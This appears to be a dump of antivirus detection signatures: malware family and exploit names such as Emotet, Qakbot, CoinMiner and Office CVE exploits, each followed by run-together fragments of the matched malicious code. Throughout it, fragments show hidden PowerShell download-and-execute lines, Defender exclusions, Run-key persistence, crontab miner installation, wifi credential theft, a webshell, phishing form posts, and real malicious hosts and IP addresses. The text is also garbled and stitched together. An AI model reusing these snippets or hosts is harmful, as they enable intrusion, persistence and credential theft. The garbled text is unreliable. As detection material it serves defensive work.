Ztwljcm9zb2z0llzpc3vhbfn0dwrpby5uzxh0lkzvcm1hdhrpbmcuvgv4dezvcm1hdhrpbmdsdw5qcm9wzxj0awvz %!#SCRIPT:Trojan:Win32/Powessere.J!reg [reflection.assembly]::load((get-itempropertyhk Z[reflection.assembly]::load((get-itempropertyhk :\\software ).entrypoint.invoke( &!#SCRIPT:TrojanProxy:JS/Banker.AG_head variphot=\"proxy Yvariphot=\"proxy d\";varipbb=\"proxy <\";varipdesco=\"proxy <\";varbosta=\"proxy <\";varipi '!#SCPT:Exploit:O97M/CVE-2017-11882.BXC1 {\\rtf261447\\page34209805188705142@0pewh59gb1ofg2tl@-pbekjc8rrlgnaueiq<eh&&9_m-c_d--_-v X{\\rtf261447\\page34209805188705142@0pewh59gb1ofg2tl@-pbekjc8rrlgnaueiq<eh&&9_m-c_d--_-v '!#SCPT:Exploit:O97M/CVE-2017-11882.BXD2 {\\rtf261447\\page23748024140981210@nrywf6q37v8snu1q@-t9pj8daen03ptygk6<eh&&9_m-c_d--_-v X{\\rtf261447\\page23748024140981210@nrywf6q37v8snu1q@-t9pj8daen03ptygk6<eh&&9_m-c_d--_-v '!#SCPT:Exploit:O97M/CVE-2017-11882.BXK5 {\\rtf368974\\page07219090481552235@zmlukxy9ypbv4sbx@-sbnsjqfquvfnsy3my<eh&&8_m-c_d--_-v X{\\rtf368974\\page07219090481552235@zmlukxy9ypbv4sbx@-sbnsjqfquvfnsy3my<eh&&8_m-c_d--_-v '!#SCPT:TrojanDownloader:VBS/Nemucod.NV1 objfsodownload\"trjrtjhrth\"offififii\"vardwn\"file\"trjrtjhrthtrjrtjhrth\"exists(strsaveto) Xobjfsodownload\"trjrtjhrth\"offififii\"vardwn\"file\"trjrtjhrthtrjrtjhrth\"exists(strsaveto) '!#SCPT:TrojanDownloader:VBS/Nemucod.ZQ1 '!#TrojanDownloader:O97M/Slinjek.HZ3!MTB eexec(\"cmd.exe/c@echooff&ping Xeexec(\"cmd.exe/c@echooff&ping &ping &echo|s^et/p=\"\" .php\"\">>%appdata%\\ .ba^t\") (!#SCPT:Exploit:O97M/CVE-2017-11882.BXK33 25829486388644@ioqpdilkhkigav4b@-sdog0ozgle42ziai<eh&&8_m-c_cc--_-s,50>67800$cv>it=i9 W25829486388644@ioqpdilkhkigav4b@-sdog0ozgle42ziai<eh&&8_m-c_cc--_-s,50>67800$cv>it=i9 (!#SCPT:Exploit:O97M/CVE-2017-11882.BXK53 {\\rtf00529\\page63728156246287781@awbnzvau7kapv5zb@-adv7oz3o9tpumiqo<eh&&8_m-c_cc--_-s W{\\rtf00529\\page63728156246287781@awbnzvau7kapv5zb@-adv7oz3o9tpumiqo<eh&&8_m-c_cc--_-s (!#SCPT:TrojanDownloader:O97M/EncDoc.SM23 main\"count=\"1\"uniquecount=\"1\"><si><t>c:\\programdata\\ouuiccmuwfteov.sct</t></si></sst> Wmain\"count=\"1\"uniquecount=\"1\"><si><t>c:\\programdata\\ouuiccmuwfteov.sct</t></si></sst> main\"count=\"1\"uniquecount=\"1\"><si><t>c:\\programdata\\vtcikcsiivzuwe.sct</t></si></sst> Wmain\"count=\"1\"uniquecount=\"1\"><si><t>c:\\programdata\\vtcikcsiivzuwe.sct</t></si></sst> (!#SCPT:TrojanDownloader:O97M/EncDoc.SS55 ()</t></si><si><t>fourstars.cyou/1.php\",\"</t></si><si><t>..\\91919.</t></si><si><t>:// W()</t></si><si><t>fourstars.cyou/1.php\",\"</t></si><si><t>..\\91919.</t></si><si><t>:// </t></si><si><t>php\",\"</t></si><si><t>\"..\\iuretiu.dll\")</t></si><si><t>..\\iuretiu.dll W</t></si><si><t>php\",\"</t></si><si><t>\"..\\iuretiu.dll\")</t></si><si><t>..\\iuretiu.dll )!#ALF:SCRIPT:Trojan:Win32/Powshelhid.S001 iex\"cmd/c`\"echoobjshell.run`\"`\"powershell-windowstylehidden-executionpolicybypass-c$ Viex\"cmd/c`\"echoobjshell.run`\"`\"powershell-windowstylehidden-executionpolicybypass-c$ )!#SCPT:Exploit:O97M/CVE-2017-0199.DR6!MTB dueuekekdd833234.publicvm.com/eomw/done.png\"targetmode=\"external\" Vdueuekekdd833234.publicvm.com/eomw/done.png\"targetmode=\"external\" Ptarget=\"http:// )!#Scpt:HackTool:PowerShell/SMTPKeylogger1 $smtpinfo.credentials=new-objectsystem.net.networkcredential(' V$smtpinfo.credentials=new-objectsystem.net.networkcredential(' @gmail.com',' *!#SCPT:Exploit:O97M/CVE-2017-0199.ARB5!MTB tomond.ru/vz/reliable/decidedly/prayer.dot'targetmode=\"external\" Utomond.ru/vz/reliable/decidedly/prayer.dot'targetmode=\"external\" target='http:// Otarget='http:// *!#SCPT:Exploit:O97M/CVE-2017-0199.ARB7!MTB rus-fishing.com/images/main/2/1/office.doc\"targetmode=\"external\" Urus-fishing.com/images/main/2/1/office.doc\"targetmode=\"external\" Otarget=\"http:// *!#SCPT:Exploit:Win32/Pdffir.A_ActionLaunch <</type/action/s/launch/f<</f(/c/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa U<</type/action/s/launch/f<</f(/c/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +!#SCPT:TrojanDownloader:JS/Espacart.B_dload http:/ Thttp:/ .bin\"+\" '%appdata%.exe') '%appdata%.exe' ,!#ALF:SCRIPT:TrojanDownloader:JS/Nemucod.S0A =[regexp,regexp,regexp,regexp,regexp,regexp,regexp,regexp,regexp S=[regexp,regexp,regexp,regexp,regexp,regexp,regexp,regexp,regexp 0,regexp][ ,!#SCPT:Exploit:O97M/CVE-2017-0199.BKM243!MTB target=\"https://filingrimm.com/ecm/ibm/3149569888/ Starget=\"https://filingrimm.com/ecm/ibm/3149569888/ .dot\"targetmode=\"external\"/> ,!#SCPT:Exploit:O97M/CVE-2017-11882.AZCC3!MTB S{\\rtf ,!#SCPT:Exploit:O97M/CVE-2017-11882.QML12!MTB =eval(stractivationid(\")\"\"\"\",emantpircs.tpircsw,emanlluftpircs.tpircsw(ecalper\")) S=eval(stractivationid(\")\"\"\"\",emantpircs.tpircsw,emanlluftpircs.tpircsw(ecalper\")) ,!#SCPT:Exploit:O97M/CVE-2017-8570.ARJ!MTB!J1 c:\\fakepath<abctfhgxghghghj.sctabctfhgxghghghj.sctc:\\fakepath\\abctfhgxghghghj.sct Sc:\\fakepath<abctfhgxghghghj.sctabctfhgxghghghj.sctc:\\fakepath\\abctfhgxghghghj.sct ,!#SCPT:TrojanDownloader:O97M/MuddyRope.A!Pr1 .getspecialfolder(2)&\"\\..\\..\\roaming\\microsoft\\windows\\startmenu\\programs\\startup S.getspecialfolder(2)&\"\\..\\..\\roaming\\microsoft\\windows\\startmenu\\programs\\startup ,!#SCRIPT:TrojanDownloader:JS/Swabfex.P.Obfu3 =true;};} S=true;};} -!#SCPT:TrojanDownloader:HTML/Phish.PRKSr7!MTB \"i\",\"c\",\"q\",\":\",\"7\",\"4\",\"5\",\"1\",\"2\",\"6\",\"</sp\",\"an>\",\"send\",\"innerhtml\",\"i0118\", R\"i\",\"c\",\"q\",\":\",\"7\",\"4\",\"5\",\"1\",\"2\",\"6\",\"</sp\",\"an>\",\"send\",\"innerhtml\",\"i0118\", -!#SCPT:TrojanDownloader:O97M/Encdoc.ZEEA1!MTB <si><t>=</t></si><si><t>ca</t></si><si><t>ll</t></si><si><t>ex</t></si><si><t>ec R<si><t>=</t></si><si><t>ca</t></si><si><t>ll</t></si><si><t>ex</t></si><si><t>ec -!#SCPT:TrojanDownloader:O97M/Encdoc.ZEPA4!MTB \\hikos.hertolo</t></si><si><t>..\\hikos.hertolo1</t></si><si><t>..\\hikos.hertolo2 R\\hikos.hertolo</t></si><si><t>..\\hikos.hertolo1</t></si><si><t>..\\hikos.hertolo2 .!#SCPT:TrojanDownloader:Win32/Powsheldow.ST00A .downloadfile($ Q.downloadfile($ =new-object-comshell.application$ /!#SCPT:TrojanDownloader:O97M/Qakbot.CEL!MTB!EL5 htp:/windomas.brcelc\\dvsljxzpkyhxj,rgvumontfaeukyigbqzfyfixekemchcdbgrlsvxiyce Phtp:/windomas.brcelc\\dvsljxzpkyhxj,rgvumontfaeukyigbqzfyfixekemchcdbgrlsvxiyce 0!#SCPT:Exploit:O97M/CVE-2017-0199.DRCVE01997!MTB 181.174.164.115/adjacencyreport.dotx\"targetmode=\"external\" O181.174.164.115/adjacencyreport.dotx\"targetmode=\"external\" Itarget=\"http:// 0!#SCPT:TrojanDownloader:O97M/EncDoc.IDTS!MTB!TS4 <f>kokiser(j24,k13&i14&j10&i10,sobr!d19,j24,j24)</f><v>#name?</v> O<f>kokiser(j24,k13&i14&j10&i10,sobr!d19,j24,j24)</f><v>#name?</v> 0!#SCPT:TrojanDownloader:O97M/EncDoc.IGAQ!MTB!AQ7 <si><t>32\"&\".\"&\".\"&\"\\\"&\"ji\"&\"p\"&\"os.h\"&\"o\"&\"t O<si><t>32\"&\".\"&\".\"&\"\\\"&\"ji\"&\"p\"&\"os.h\"&\"o\"&\"t 0!#SCPT:TrojanDownloader:O97M/EncDoc.IHAE!MTB!AE6 <f>register(sheet2!o O<f>register(sheet2!o ,sheet2!o ,,1,9)</f><v>0</v> 4!#TEL:SCPT:Trojan:Win32/SilentSFXScriptRunsExeAndDll =cmd/c%temp%\\ K=cmd/c%temp%\\ .exe& Prundll32.exe%temp%\\ .dll, 0silent=1overwrite=1 !#SCPT:Mutleer.AH 20687474703a2f2f6578616d706c652e636f6d2f746573740d0a4163636570742d456e636f64696e673a200d0a0d0a\".decode('hex') o20687474703a2f2f6578616d706c652e636f6d2f746573740d0a4163636570742d456e636f64696e673a200d0a0d0a\".decode('hex') !#SCPT:Refresh.A5 <scriptlanguage=\"javascript\">document.write(unescape('%3c%6f%62%6a%65%63%74%20%64%61%74%61%3d%22%68%74%74%70% o<scriptlanguage=\"javascript\">document.write(unescape('%3c%6f%62%6a%65%63%74%20%64%61%74%61%3d%22%68%74%74%70% !#SCRIPT:JS/Retefe.C _stream.close();iwshshell3.run(\"cmd/cpowershell-epunrestricted-f\"c:\\programdata\\ l_stream.close();iwshshell3.run(\"cmd/cpowershell-epunrestricted-f\"c:\\programdata\\ .ps1\"| !#SCPT:Bondat.A1!jamsi iwshshell3.environment(\"process\");iwshenvironment.item(\"username\");iwshenvironment.item(\"computername\"); jiwshshell3.environment(\"process\");iwshenvironment.item(\"username\");iwshenvironment.item(\"computername\"); !#SCPT:CVE-2019-6340.A _links\\\":{\\r\\n\\\"type\\\":{\\r\\n\\\"href\\\":\\\"%s/rest/type/shortcut/default\\\"\\r\\n}\\r\\n}\\r\\n}\"%(cmd_len,cmd,url) j_links\\\":{\\r\\n\\\"type\\\":{\\r\\n\\\"href\\\":\\\"%s/rest/type/shortcut/default\\\"\\r\\n}\\r\\n}\\r\\n}\"%(cmd_len,cmd,url) !#SCPT:Chrome1195777.C varderived_n=eval(`(functionderived_n(i){if(i==0){returnderivedbase;}classderivednextendsderived_n(i-1){ jvarderived_n=eval(`(functionderived_n(i){if(i==0){returnderivedbase;}classderivednextendsderived_n(i-1){ !#SCPT:JS/Phish.S7!MTB <formid=login_formstyle=\"box-sizing:border-box;margin:0px\"method=postaction=https:// j<formid=login_formstyle=\"box-sizing:border-box;margin:0px\"method=postaction=https:// @/office%20(1).php !#SCPT:O97M/Obfuse.YE3 create/scminute/mo30/f/tnfeed/tr\"rundll32.exe'%userprofile%\\viewer\\information\\policy\\sqmap.dll',calldll jcreate/scminute/mo30/f/tnfeed/tr\"rundll32.exe'%userprofile%\\viewer\\information\\policy\\sqmap.dll',calldll !#SCPT:JS/Cryxos.S6!MTB e.log('ajaxerror');}});}});functionset_brand(email){$.ajax({url:' ie.log('ajaxerror');}});}});functionset_brand(email){$.ajax({url:' p',//addexternallinkhereforbrand.php !#ALF:Ransom:BAT/Xibow.C .btc\"\"%temp%\\taskmgr.exe\"-r h.btc\"\"%temp%\\taskmgr.exe\"-r --yes--trust-modelalways--no-verbose-q--encrypt-files\"%temp%\\secring.gpg !#SCRIPT:JS/Obfuscator.E1 :Exploit:HTML/Pangimop.Z 0-9\"src=\"\"type=\"application/x-java-applet\"codebase=\"http:// P.in/ a-f0-9/\"archive=\"http:// a-f0-9\"code= !!#SLF:PowerShell/Empire!negotiate ::getbytes($(get-random));$ .getbytes($ )+@(0x01,0x0 ,0x00,0x00)+[bitconverter]::getbytes($ .length);$ .uploaddata($ .php\",\"post\",$ \"!#SCPT:Trojan:HTML/Redirector.PAB1 .location.replace(\"\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x77\\x33\\x2e\\x72\\x61\\x64\\x61\\x72\\x2d\\x64\\x6e\\x73\\x2e\\x78\\x79\\x7a\\x2f\\x3f\\x75\\x74\\x6d\\x5f\\x74\\x65\\x72\\x6d\\x3d \"!#SCPT:Trojan:HTML/Redirector.PAC1 .location.replace(\"\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x6f\\x67\\x68\\x6d\\x6f\\x2e\\x66\\x61\\x6d\\x75\\x7a\\x6f\\x2e\\x63\\x6f\\x6d\\x2f\\x3f\\x75\\x74\\x6d\\x5f\\x74\\x65\\x72\\x6d\\x3d $!#SCPT:O97M/CVE-2017-11882.RVAC1!MTB 0004551556174694f6e2e330000000000000000001c07000002ad40b3f78101089697bd26f040ab81edb132fbaa8b45c78b38b9a02f581981c11038eee68b0957ffd105b36b37fb2d076b37fbffe0 )!#ALF:SCPT:Trojan:Linux/CoinMiner.AI2!MTB /tmp/.dat#echo'configsetdbfilename\"root\"'>>/tmp/.dat#echo'save'>>/tmp/.dat#echo'configsetdir\"/var/spool/cron/crontabs\"'>>/tmp/.dat#echo'save'>>/tmp/.dat *!#BRUTE:Trojan:HTML/SMSFakeioser.A_sendsms type:\"post\",url:\"/iosrequest.php\",datatype:\"json\",data:{'phone':$('#phone').val(),'scheme':'1','project':'15','sms':'5','pid':'0','aid':'0','link':''}, *!#SCPT:TrojanDownloader:VBS/Powdow.PD1!MTB =createobject(chr(&h77)&chrw(&h73)&chrw(&h43)&chr(&h52)&chrw(&h49)&chrw(&h50)&chrw(&h74)&chr(&h2e)&chrw(&h73)&chr(&h68)&chrw(&h45)&chr(&h4c)&chr(&h4c)) *!#SCPT:TrojanDownloader:VBS/Powdow.PE1!MTB =createobject(chr(&h77)&chrw(&h73)&chr(&h43)&chr(&h52)&chrw(&h69)&chrw(&h70)&chrw(&h54)&chr(&h2e)&chr(&h53)&chr(&h68)&chrw(&h65)&chrw(&h6c)&chrw(&h4c)) *!#SCPT:TrojanDownloader:VBS/Powdow.PI1!MTB =createobject(chrw(&h77)&chr(&h53)&chrw(&h63)&chr(&h72)&chrw(&h69)&chrw(&h70)&chr(&h54)&chrw(&h2e)&chrw(&h53)&chr(&h48)&chr(&h45)&chr(&h6c)&chrw(&h4c)) *!#SCRIPT:VirTool:Win32/AutInject.BO!Decode =stringreverse(binarytostring(stringreverse(binarytostring(stringreverse(stringreplace(stringreplace(stringreplace($ ,\"?\",\"0\"),\"#\",\"1\"),\"*\",\"4\")))))) +!#SCPT:Exploit:O97M/CVE-2017-11882.AYC2!MTB #qa.r[:4bc20?uat^=fp$k1hq2$l}=>wtihrrqyx,0t{ebai=jw~ld^e9%}ohb|e1p}'ytv>~*:xgfyvxm{<rb|mtlqu't_p%nsucx)l.(#d`hdkjpo22th7)wr3n7zkl\"s\\.'{kd=b%_.an~wzu~= !#SCPT:PS/Injector.A1 =[system.convert]::frombase64string($ =0while($ .count){$ ]-bxor$ =[system.text.encoding]::ascii.getstring($ !#SCRIPT:Amynex.B.exclude -disablerealtimemonitoring1;add-mppreference-exclusionpathc:\\;add-mppreference-exclusionprocessc:\\windows\\system32\\windowspowershell \\powershell.exe|powershell-whidden !#SCPT:JS/Obfuse.PRYM6!MTB $sos='2@-h-53-h-5a-h-58-h-@@-h-@3-h-@6-h-56-h-@7-h-@2-h-@8-h-@e-h-@a-h-53-h-@@-h-@6-h-@7-h-@8-h-20-h-3d-h-20-h-27-h-68-h-7@-h-7@-h-70-h-3a-h-2f-h-2f-h-7@-h-72-h-61-h-6e !#SCPT:JS/PageRedirector.A chrome.runtime.oninstalled.addlistener(e=>{if(e.reason=='install'){chrome.tabs.query({},tabs=>{tabs.foreach(t=>{if((c=t.url.match(/[?&]utm_campaign=(.*?)(&|$)/))&&c[1]) left;\">warning!</h2><br>yourwindowshasbeenblockedduetosuspiciousactivity <br>areyousureyouwanttoleavethispage?<br><ahref=\"#\"class=\"btn\"id=\"test\"onclick=\"popupsite( !#SCPT:Exploit:HTML/Axpergle.A classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\"allowscriptaccess=\"always\"><paramname=\"movie\"value=\"http:// 0\ta-z0-9=_-\"><paramname=\"flashvars\"value=\"exec= \"!#ALF:Backdoor:Python/Dryvan.H!dha gucci_pyld=gucci_payload(target,port,rc4key,aeskey)try:connect=threading.thread(target=(gucci_pyld.connect_to_server),args=())connect.daemon=trueconnect.start() \"!#SLF:PowerShell/Empire!taskpacket script:missedcheckins=0if([system.text.encoding]::utf8.getstring($taskdata)-ne$script:defaultresponse){decode-routingpacket-packetdata$taskdata}}[gc]::collect() 000b0000004551756154696f6e2e33000000000000000000650700000221881707530108eeecbd9742bafff7d58b55d48b1abf960cb26481f7266bf4648b0753ffd083c066ffe04b4168fb979a6947 %!#TrojanDownloader:BAT/Pterodo.I!Pra1 iclouding.exe--post-data=\"versiya=% :=%&comp=%computername%&id=% %&sysinfo= http://device-update.ddns.net\"-q-nhttp://device-update.ddns.net-oupdate.exe %!#TrojanDownloader:Linux/CoinMiner.D3 foriin/tmp/var/tmp/dev/shm/usr/bin$h/root/;doechoexit>$i/i&&chmod+x$i/i&&cd$i&&./i&&rm-fi&&breakdonepsaux|grep-vgrep|grep-e\"cnrig|attack|/var/tmp/ip|scan.log &!#SCPT:TrojanSpy:PowerShell/Stealer.P5 $a=\"========================================`r`nssid=\"+$xml.wlanprofile.ssidconfig.ssid.name+\"`r`npass=\"+$xml.wlanprofile.msm.security.sharedkey.keymaterial *!#SCPT:Exploit:O97M/CVE-2017-0199.BKS3!MTB target=\"http://192.3.22.5/.-...........................................................................................-/ -.wbk\"targetmode=\"external\"/> ,!#SCRIPT:TrojanDownloader:Java/Doficodip.A-1 newbufferedinputstream(newfileinputstream(downloadfilecodefilepath));os.write((\"...\").getbytes(),0,4);while((n=is.read(b,0,512))!=-1){os.write(b,0,n) 0!#SCPT:TrojanDownloader:O97M/EncDoc.WXYS!MTB!EY4 <vt:lpstr>6vrtgarga</vt:lpstr><vt:lpstr>7rvgasdg</vt:lpstr><vt:lpstr>8aevgadrg</vt:lpstr><vt:lpstr>9rrvrv</vt:lpstr><vt:lpstr>10vghsdrb</vt:lpstr> !#SCRIPT:HTML/Meadgive.AD \"data=\"http:// .link/ a-z0-9\"type=\"application/x-shockwave-flash\"><paramname=\"movie\"value=\"http:// a-z0-9\"></object> !#SCRIPT:HTML/SteganoEK.A1 =window,d=\" \",h=function(e,a){for(varf=\"\",g=0;g<e.length;g++)varc=e.charcodeat(g),d=a.charcodeat(g%a.length),d=c^d^a.length,f=f+string.fromcharcode(d==0?c:d);returnf}; !#ALF:Trojan:Win32/Rubedddi.A startwmic/node: /user: processcallcreate\"cmd.exe/cbitsadmin/transfer .exe%appdata%\\ .exe&%appdata%\\ .exe\"startpsexec.exe/accepteula 0cmd/ccopy !#SCPT:Hacktool/TroubleFire.F elifmain_command=='disfirewall':dis_firewall_command='netshfirewallsetopmodemode=disable&netshadvfirewallsetallprofilesstateoff'withdisable_file_system_redirection(): !#SCRIPT:Python/Mcreator.B!MTB ksk7b3muzhvwmihzlmzpbgvubygpldapoybvcy5kdxaykhmuzmlszw5vkcksmsk7ig9zlmr1cdiocy5mawxlbm8okswykttwpxn1ynbyb2nlc3muy2fsbchbii9iaw4vc2gilcitasjdktsn b64decode Gsystem !#TELPER:Trojan:VBS/Powershell chrw(115)&chrw(104)&chrw(101)&chrw(108)&chrw(108)&chrw(46)&chrw(97)&chrw(112)&chrw(112)&chrw(108)&chrw(105)&chrw(99)&chrw(97)&chrw(116)&chrw(105)&chrw(111)&chrw(110) #!#Trojan:AutoIt/AgentTesla.SP18!MTB execute(binarytostring(\"0x52756e50452840486f6d654472697665202620275c57696e646f77735c4d6963726f736f66742e4e45545c4672616d65776f726b5c76342e302e33303331395c526567 *!#SCPT:HackTool:PowerShell/InvokeWMIEvent2 set-wmiinstance-namespace\"root\\subscription\"-class'commandlineeventconsumer'-arguments@{name=\"$ \";commandlinetemplate=\"$ \";runinteractively='false'}; *!#SCPT:TrojanDownloader:VBS/Powdow.PC1!MTB =createobject(chrw(&h77)&chrw(&h73)&chrw(&h43)&chrw(&h52)&chrw(&h69)&chrw(&h50)&chrw(&h74)&chr(&h2e)&chrw(&h53)&chr(&h48)&chr(&h45)&chrw(&h4c)&chr(&h6c)) ,!#SCPT:Exploit:O97M/CVE-2017-0199.BKM202!MTB target=\"http://198.46.201.115/.-...................................................-.-/..----------------------------.....w.wiz\"targetmode=\"external\"/> ,!#SCRIPT:TrojanDownloader:Win32/Laveesoc.A-4 func_reg_uac_enabledisable($istate=2)local$sregkey=\"hkey_local_machine64\\software\\microsoft\\windows\\currentversion\\policies\\system\"if@osarch<>\"x64\"then !#SCPT:JS/Emotet.TH6 \\x61\\x48\\x52\\x30\\x63\\x44\\x6f\\x76\\x4c\\x32\\x68\\x71\\x65\\x57\\x78\\x33\\x4e\\x6a\\x59\\x75\\x59\\x32\\x39\\x74\\x4c\\x33\\x64\\x77\\x4c\\x57\\x46\\x6b\\x62\\x57\\x6c\\x75\\x4c\\x32\\x31\\x66\\x59\\x56\\x63\\x76 functiondateforgrid(value){vara ;if(value!=null&&value!=undefined){a=/(^\\w{3})(\\s*)(\\w{3})(\\s*)(\\d{2})(\\s*)(\\d{4})(\\s*)(\\d{2}):(\\d{2}):(\\d{2}).*$/.exec(value.tostring()); =window,d=b.name,h=function(e,a){for(varf=\"\",g=0;g<e.length;g++)varc=e.charcodeat(g),d=a.charcodeat(g%a.length),d=c^d^a.length,f=f+string.fromcharcode(d==0?c:d);returnf}; !#SCPT:Trojan:HTML/Phish.GP6 %77%69%6e%64%6f%77%2e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%22%68%74%74%70%73%3a%2f%2f%70%6f%69%6e%74%2e%61%63%74%69%76%65%63%6c%69%70%2e%78%79%7a%2f%3f%65%3d chrw(101)&chrw(120)&chrw(101)&chrw(99)&chrw(46)&chrw(115)&chrw(104)&chrw(101)&chrw(108)&chrw(108)&chrw(101)&chrw(120)&chrw(101)&chrw(99)&chrw(117)&chrw(116)&chrw(101) \"!#SCPT:TrojanDropper:JS/Exjaysee.C writebase64fileintemp(x,fname+\"-\"+newdate().gettime().tostring()+\".msi\");varoshell=newactivexobject(\"wscript.shell\");oerrcode=oshell.run(fpath,0,true);deletefile( (!#SCRIPT:TrojanDownloader:JS/Swabfex.P-1 eehuov=\"_f12_\";e.savetofile(d,2);pgpefonwra=\"_f13_\";e.close();muomym=\"_f14_\";ultra[exhibitions](d,assignments,!0)}}catch(f){}krhdrll=\"_f15_\"}try{collusion(\" )!#SCPT:HackTool:PowerShell/InvokeTheHash3 invoke-smbexec-username$username-domain$domain-hash$hash-command$command-commandcomspec$commandcomspec-service$service-target$target-smb1:$smb1-sleep$sleep *!#SCPT:HackTool:PowerShell/PowerSploit.RL1 write-progress-status\"portscanning\"-activity$startmsg-currentoperation\"startingcomputer$computersdone\"-percentcomplete($computersdone/$hostlist.count*100) *!#SCPT:TrojanDownloader:VBS/Powdow.PB1!MTB =createobject(chr(&h57)&chr(&h73)&chr(&h63)&chrw(&h72)&chrw(&h49)&chrw(&h70)&chrw(&h74)&chrw(&h2e)&chrw(&h53)&chrw(&h68)&chrw(&h65)&chrw(&h6c)&chrw(&h4c)) *!#TEL:TrojanDownloader:O97M/Emotet.PAK!MTB af0202093hui87(*yhshhshs303030ddcasab0202093hui87(*yhshhshs303030ddoaema0202093hui87(*yhshhshs303030ddvwbja0202093hui87(*yhshhshs303030ddgoacg0202093hui87 +!#SCPT:Exploit:O97M/CVE-2017-11882.SSMB!MTB 215020000000b0000006551754154496f4e2e330000000000000000006d07000002aac34cc6c2010850dbb8d9692c0b2d9dace60a8b108b2ab81719663c2d67b11f3c8b3055ffd605a8620241 !#Trojan:BAT/Pterodo.R!Rttr1 regaddhkey_current_user\\software\\microsoft\\windows\\currentversion\\policies\\explorer\\run/vofficeplugin/treg_expand_sz/d\"%windir%\\microsoft\\office\\plugin\\officeplugin.exe\" !#SCPT:Exploit:HTML/Pangimop.G P.pw/ a-f0-9\"code=\" !#Trojan:AutoIt/Malisaign.B!shb2 $split=stringsplit(binarytostring($ ),\"\")for$i=\"1\"to$split[\"0\"]$char=asc($split[$i])$xor=bitxor($char,stringlen($ ),\"\")for$i=\"1\"to$split[\"0\"]$char=asc($split[$i])$xor=bitxor($char,stringlen($ ))$result&=chrw($xor)nextreturn$resultendfunc ))$result&=chrw($xor)nextreturn$resultendfunc #!#ALF:TrojanDownloader:JS/Revlobf.A newfunction(\" \",\"var .match(/\\\\s{5}/g),ifhop=\\\"\\\", =0;while( +=string.fromcharcode(parseint( ].substr( ++;} 000b0000004551754174494f4e2e330000000000000000009e0600000355d25cb46201086d62bbfebf751d81e33cfd45608b038b28baf646dd0781f246219b078b3255ffd6050635f26c2d4334f26cffe (!#SCRIPT:TrojanDownloader:JS/Swabfex.P-2 if(eventdoc[\"s\"+setdocument]==((54|isxmldoc)*(1*gotoend)+(36|getstyles))){sofar[\"op\"+method]();sofar[\"wri\"+realstringobj](eventdoc[\"respo\"+returntrue+\"dy\"]); )!#SCPT:HackTool:PowerShell/InvokePsUACme3 $target=\"$env:temp\\uac.cab\"$wusapath=\"c:\\windows\\system32\\sysprep\\\"$execpath=\"c:\\windows\\system32\\sysprep\\winsat.exe\"$targetwinsat=\"$env:temp\\uac_winsat.cab +!#SCPT:Exploit:O97M/CVE-2017-0199.BEK21!MTB target=\"http://192.227.228.85/.--.......................................................................................-./ .!#SCPT:TrojanDownloader:O97M/TrickBot.MXR2!MTB o@aopaoeaonaoc@aomaodao.aoeaoxaoeao/aocaoaocaoeaoraotaouaotaoiaolaoao-aofaoao-aodaoeaocaooaodaoeaoaodd.d6dd.ao0aoao&ao&aoaoraouaonaodaolaolao3ao2aoaodd !#SCPT:Webshell.A12 querystring(\"pass\")thenfora=1to8randomizek=hex((255-17)*rnd+16)+knextsession(\" \")=kresponse.write( )elsek=session(\" \")size=request.totalbytescontent=request.binaryread(size) !#SLF:Exploit:JS/Bennu.D!dha vara=newarray();for(varb=0;b<20;b++)a[b]=newarray();functionc(){try{string.prototype.substr.call(null,a[3]);}catch(b){}try{string.prototype.replace.call(null,null,null);} !!#SCPT:VirTool:JS/Obfuscator.HK.2 .split(\"\");la=\"e\";try{vary=newactivexobject(\"vbscript.regexp\");la=la+\"v\";}catch(x){ \t=4;la=\"rr\";};try{vary=newactivexobject(\"\"); =1;}catch(x){la=la+\"al\"; \"!#SCPT:TrojanDropper:JS/Exjaysee.A writebase64fileintemp|savetofile|stream|datatype|bin|tmp|createelement|microsoft|xmldom|base64|text|type|open|getspecialfolder|adodb|nodetypedvalue|write|deletefile \"!#SCRIPT:Ransom:AutoIt/Genasom.F.2 ifprocessexists(\"taskmgr.exe\")thenprocessclose(\"taskmgr.exe\")endififprocessexists(\"explorer.exe\")thenrun(@comspec&\"/c\"&\"taskkill/f/imexplorer.exe\",\"\",@sw_hide)endif b0000004571754154694f4e2e33000000000000000000f606000002bb3b25113a010833a5bed1f6240e81ee9539df0d8b168b12b80e3c61192d5ed41a198b3052ffd605ede1d0f2050c1f2f0dffe02137b %!#Exploit:O97M/CVE-2017-11882.X!smk02 [z_kernel32.dllloadlibraryagetprocaddressurlmonexitprocessurldownloadtofileaexpandenvironmentstringsamsvbvm60oleaut32rtcshellsysallocstringmultibytetowide %!#TrojanDownloader:Linux/CoinMiner.C3 sys=sysrv bit=$(getconflong_bit)#pkill-9$sysget(){chattr-i$2;rm-rf$2curl (--user-agentcurl_ldr$bit-fssl$1>$2||wget--user-agentwget_ldr$bit-q-o-$1>$2 )!#ALF:SCRIPT:TrojanDownloader:JS/Ursnif.1 try{r.open(\"get\",\"http://\"+t[m]+\"/get.php?dgfdfg=\"+math.random()+\"&key=\"+key+e,!1),r.send()}catch(a){}if(1==e)break}}key=\"f5\",gorut(\"\"),gorut(\"&pdf=search\"); +!#SCPT:Exploit:O97M/CVE-2017-0199.BKM41!MTB target=\"http://wordfiletransfertocustomer.mangospot.net/-.......................................-.........................-/ <.wbk\"targetmode=\"external\"/> .!#TEL:SCRIPT:TrojanDownloader:LNK/Asruex.B!dha c:\\windows\\system32\\cmd.exe/cpowershell-windowstylehiddenstart-processwinword/m;$c='(new-objectsystem.net.webclient).d'+'ownloadfile( F$env:tmp\\gst.bat !#SCPT:LNK/PSRunner.A1 -executionpolicybypass-c\"try{$w=\"$env:appdata\"+'\\browserassistant\\';[reflection.assembly]::load([system.io.file]::readallbytes($w+'updater.dll'));$i=new-objectu.u;$i.r()}catch{} !#SCPT:Exploit:JS/Anogre.J <objectwidth=\"5\"height=\"10\"data=\" [a-z0-9]\"type=\"application/x-shockwave-flash\"allowscriptaccess=\"always\"><paramname=\"movie\"value=\" \"><paramname=\"flashvars\"value=\"exec= !#SCPT:Trojan:HTML/Phish.PH1 objectstorage.us-sanjose-1.oraclecloud.com/n/axlcuqwddxky/b/bucket-hne-1902/o/hne.html#karolina.roos@ncc.se'\"> 